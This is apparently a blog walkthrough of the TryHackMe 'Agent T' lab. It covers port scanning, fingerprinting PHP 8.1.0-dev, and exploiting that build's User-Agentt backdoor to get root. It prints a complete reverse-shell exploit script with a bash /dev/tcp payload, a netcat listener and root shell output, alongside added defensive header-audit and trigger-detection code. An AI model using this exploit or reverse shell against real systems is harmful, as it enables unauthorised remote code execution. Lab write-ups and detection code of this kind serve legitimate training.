Tryhackme Agent T Walk through

Nelly Mutai
5 min read · Aug 6, 2022

Room Name: Agent T

URL: https://tryhackme.com/room/agentt

Rating: Easy

Enumeration

We start with some recon on the room: nmap scans of both the TCP and the UDP port ranges.

sudo nmap --min-rate=1000 -p0-65535 10.10.147.137
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-06 09:23 EAT
Nmap scan report for 10.10.147.137
Host is up (0.16s latency).
Not shown: 65535 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http

The full TCP scan shows only one open port, HTTP on port 80. We proceed with the default-script and version scans against it.

sudo nmap -sC -sV -p80 -oA nmap/tcp_ports 10.10.147.137
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-06 09:26 EAT
Nmap scan report for 10.10.147.137
Host is up (0.16s latency).

PORT STATE SERVICE VERSION
80/tcp open http PHP cli server 5.5 or later (PHP 8.1.0-dev)
|_http-title: Admin Dashboard

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.07 seconds

UDP Scan

Nmap UDP scan did not result in anything useful.

sudo nmap --min-rate=1000 -sU 10.10.147.137                                                                     
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-06 09:32 EAT
Nmap scan report for 10.10.147.137
Host is up (0.24s latency).
Not shown: 991 open|filtered udp ports (no-response)
PORT STATE SERVICE
1000/udp closed ock
5003/udp closed filemaker
5093/udp closed sentinel-lm
17468/udp closed unknown
19227/udp closed unknown
20851/udp closed unknown
47915/udp closed unknown
49226/udp closed unknown
57409/udp closed unknown

Visiting the URL takes us to the site's admin dashboard, where we are already logged in as the administrator. We then do content discovery on the page source, check for robots.txt and try different payloads on the search page, but none of this leads anywhere.

Running feroxbuster against the target URL did not identify anything useful either: the WLD line in the output below shows the server answered 200 for a random 32-character path, so every guessed path looks like a hit and the brute force is not informative.

feroxbuster -u http://10.10.147.137/

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `  / \ \_/ | | \ |__
|    |___ |  \ |  \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.7.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.147.137/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.7.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
WLD  GET  755l  2101w  0c Got 200 for http://10.10.147.137/d388792219a740c694cab0d4d6dd1e0e (url length: 32)
[####################] - 11m  30000/30000  0s  found:1  errors:0
[####################] - 11m  30001/30000  43/s  http://10.10.147.137/

Both the nmap TCP scan above and the nikto scan identify the application as running PHP/8.1.0-dev.

nikto -host 10.10.147.137
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.147.137
+ Target Hostname:    10.10.147.137
+ Target Port:        80
+ Start Time:         2022-08-06 09:32:33 (GMT3)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ Retrieved x-powered-by header: PHP/8.1.0-dev
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible
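The nikto findings above are all derived from response headers. As an added example (not part of the original walkthrough, and not nikto's code), the following Python function performs the same audit on a headers dictionary: it reports the hardening headers nikto flagged as absent and treats an X-Powered-By value advertising PHP/8.1.0-dev as critical, since that is the backdoored build. The sample headers are constructed to match the nikto output on this page; the header names and the audit_live helper are my own choices.

```python
# Added example: audit HTTP response headers the way nikto's findings
# above are derived, and flag the backdoored PHP 8.1.0-dev build.
from typing import Dict, List

# Hardening headers nikto reported as absent on the Agent T box.
HARDENING_HEADERS = {
    "X-Frame-Options": "clickjacking protection",
    "X-Content-Type-Options": "MIME-sniffing protection",
    "X-XSS-Protection": "legacy XSS filter hint",
}

# Version strings known to carry the March 2021 backdoor.
BACKDOORED_PHP = ("PHP/8.1.0-dev",)


def audit_headers(headers: Dict[str, str]) -> List[str]:
    """Return a list of findings for one HTTP response's headers.

    Header names are compared case-insensitively, as HTTP requires.
    """
    lower = {k.lower(): v for k, v in headers.items()}
    findings: List[str] = []

    for name, why in HARDENING_HEADERS.items():
        if name.lower() not in lower:
            findings.append(f"missing {name} ({why})")

    powered_by = lower.get("x-powered-by", "")
    if powered_by:
        # Any version disclosure is a finding; the dev build is a critical one.
        findings.append(f"version disclosure: X-Powered-By: {powered_by}")
        if any(v.lower() in powered_by.lower() for v in BACKDOORED_PHP):
            findings.append(
                "CRITICAL: backdoored PHP 8.1.0-dev build advertised; "
                "upgrade PHP / rebuild the image"
            )
    return findings


# Constructed sample: the only interesting header nikto saw was X-Powered-By.
SAMPLE_HEADERS = {
    "Host": "10.10.147.137",
    "Connection": "close",
    "X-Powered-By": "PHP/8.1.0-dev",
    "Content-Type": "text/html; charset=UTF-8",
}


def audit_live(url: str, timeout: float = 5.0) -> List[str]:
    """Fetch url and audit its response headers (needs network and requests)."""
    import requests  # imported lazily so the offline sample still runs
    resp = requests.get(url, timeout=timeout, allow_redirects=False)
    return audit_headers(dict(resp.headers))


if __name__ == "__main__":
    for finding in audit_headers(SAMPLE_HEADERS):
        print(finding)
```

Run against the constructed sample it returns five findings: the three missing hardening headers, the version disclosure, and the critical backdoored-build line. A hardened response that sets all three headers and suppresses X-Powered-By returns an empty list.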

We go ahead and search for exploits affecting PHP/8.1.0-dev, which turns up the following references:

  1. https://www.exploit-db.com/exploits/49933
  2. https://github.com/flast101/php-8.1.0-dev-backdoor-rce
  3. https://packetstormsecurity.com/files/162749/PHP-8.1.0-dev-Backdoor-Remote-Command-Injection.html
  4. https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
  5. https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md

From these articles we learn of the PHP/8.1.0-dev backdoor. Sending a test User-Agentt header results in an exception.

We proceed with the Python backdoor script, which gives us limited root access to the box.
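The backdoor described in those references keys on a request header literally named User-Agentt whose value begins with the string zerodium (the exploit later on this page builds exactly that header). As an added example, not part of the original walkthrough, here is a small Python detector a defender can run over captured requests at a proxy or WAF: it parses the raw request, finds the trigger header case-insensitively, and distinguishes a real trigger from a bare probe. The sample requests are constructed; the function and constant names are mine.

```python
# Added example: detect the PHP 8.1.0-dev backdoor trigger in a raw HTTP request.
# The backdoored build executes code when a "User-Agentt" header starts
# with "zerodium"; a normal "User-Agent" header is never involved.
from typing import Dict, Optional, Tuple

TRIGGER_HEADER = "user-agentt"   # compared after lower-casing
TRIGGER_PREFIX = "zerodium"


def parse_request_headers(raw: bytes) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP/1.x request into (request line, lower-cased headers).

    Obsolete folded headers are not supported; modern servers reject them.
    """
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    request_line = lines[0]
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return request_line, headers


def check_backdoor_trigger(raw: bytes) -> Optional[str]:
    """Return an alert string if the request would trip the backdoor, else None."""
    request_line, headers = parse_request_headers(raw)
    value = headers.get(TRIGGER_HEADER)
    if value is None:
        return None
    if value.lower().startswith(TRIGGER_PREFIX):
        # Truncate the echoed value so the alert itself stays short.
        return f"backdoor trigger: {request_line!r} User-Agentt={value[:40]!r}"
    # A User-Agentt header without the prefix is still a probe worth logging.
    return f"suspicious header User-Agentt (no trigger prefix): {request_line!r}"


# Constructed samples: a normal browser request, a probe, and a trigger
# shaped like the injection header used by the exploit on this page.
BENIGN = (b"GET / HTTP/1.1\r\nHost: 10.10.147.137\r\n"
          b"User-Agent: Mozilla/5.0\r\n\r\n")
PROBE = (b"GET / HTTP/1.1\r\nHost: 10.10.147.137\r\n"
         b"User-Agentt: test\r\n\r\n")
TRIGGER = (b"GET / HTTP/1.1\r\nHost: 10.10.147.137\r\n"
           b"User-Agentt: zerodiumsystem('id');\r\n\r\n")


if __name__ == "__main__":
    for sample in (BENIGN, PROBE, TRIGGER):
        print(check_backdoor_trigger(sample))
```

Two practical notes. The standard combined access-log format records only the User-Agent header, so this trigger is invisible in ordinary web logs; the check has to run where the full request is available. And detection is a stopgap: the page's fourth reference is the php-src commit that removed the backdoor, so the actual fix is to replace the dev build with a release build of PHP.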

python3 backdoor.py
Enter the host url:
http://10.10.147.137/

Interactive shell is opened on http://10.10.147.137/
Can’t acces tty; job crontol turned off.
$ id
uid=0(root) gid=0(root) groups=0(root)

$ pwd
/var/www/html

$ cd /home

$ ls
404.html
blank.html
css
gulpfile.js
img
index.php
js
package-lock.json
package.json
scss
vendor

$ cd vendor

$ ls
404.html
blank.html
css
gulpfile.js
img
index.php
js
package-lock.json
package.json
scss
vendor

$ cd /root

Note that the listing after cd /home is still the web root: each command in this pseudo shell is sent as a separate HTTP request, so directory changes do not persist between commands. That is the "limited" part, and the reason for moving to a proper reverse shell next.

Shell as Root

rev_shell.py contents:

#!/usr/bin/env python3
# Exploit Title: PHP 8.1.0-dev Backdoor Remote Code Execution
# Date: 23 may 2021
# Exploit Author: flast101
# Vendor Homepage: https://www.php.net/
# Software Link:
#     - https://hub.docker.com/r/phpdaily/php
#     - https://github.com/phpdaily/php
# Version: 8.1.0-dev
# Tested on: Ubuntu 20.04
# CVE : N/A
# References:
#     - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
#     - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md

"""
Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py
Contact: flast101.sec@gmail.com

An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021,
but the backdoor was quickly discovered and removed. If this version of PHP runs on a server,
an attacker can execute arbitrary code by sending the User-Agentt header.
The following exploit uses the backdoor to provide a pseudo shell on the host.

Usage:
python3 revshell_php_8.1.0-dev.py <target-ip> <attacker-ip> <attacker-port>
"""

import os, sys, argparse, requests

request = requests.Session()


def check_target(args):
    # The backdoored build advertises itself in a response header (X-Powered-By).
    response = request.get(args.url)
    for header in response.headers.items():
        if "PHP/8.1.0-dev" in header[1]:
            return True
    return False


def reverse_shell(args):
    # The trigger header name is "User-Agentt"; the value must start with "zerodium".
    payload = 'bash -c \"bash -i >& /dev/tcp/' + args.lhost + '/' + args.lport + ' 0>&1\"'
    injection = request.get(args.url, headers={"User-Agentt": "zerodiumsystem('" + payload + "');"}, allow_redirects = False)


def main():
    parser = argparse.ArgumentParser(description="Get a reverse shell from PHP 8.1.0-dev backdoor. Set up a netcat listener in another shell: nc -nlvp <attacker PORT>")
    parser.add_argument("url", metavar='<target URL>', help="Target URL")
    parser.add_argument("lhost", metavar='<attacker IP>', help="Attacker listening IP",)
    parser.add_argument("lport", metavar='<attacker PORT>', help="Attacker listening port")
    args = parser.parse_args()
    if check_target(args):
        reverse_shell(args)
    else:
        print("Host is not available or vulnerable, aborting...")
        sys.exit(1)  # the original had a bare `exit`, which does nothing


if __name__ == "__main__":
    main()

python3 rev_shell.py
usage: rev_shell.py [-h] <target URL> <attacker IP> <attacker PORT>
rev_shell.py: error: the following arguments are required: <target URL>, <attacker IP>, <attacke

With our listener set up, we run the script above:

python3 rev_shell.py http://10.10.147.137/ <ATTACKER-IP> <LISTENING-PORT>

and obtain a shell as root:

nc -lvnp 9001                             
listening on [any] 9001 ...
connect to [10.9.90.128] from (UNKNOWN) [10.10.147.137] 34130
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@3f8655e43931:/var/www/html# cd /home
cd /home
root@3f8655e43931:/home# ls
root@3f8655e43931:~# find / -type f -name flag.txt
find / -type f -name flag.txt
/flag.txt

Thank you for the read.

Until next time!!

Nelly Mutai

CTF player, information security researcher, pentester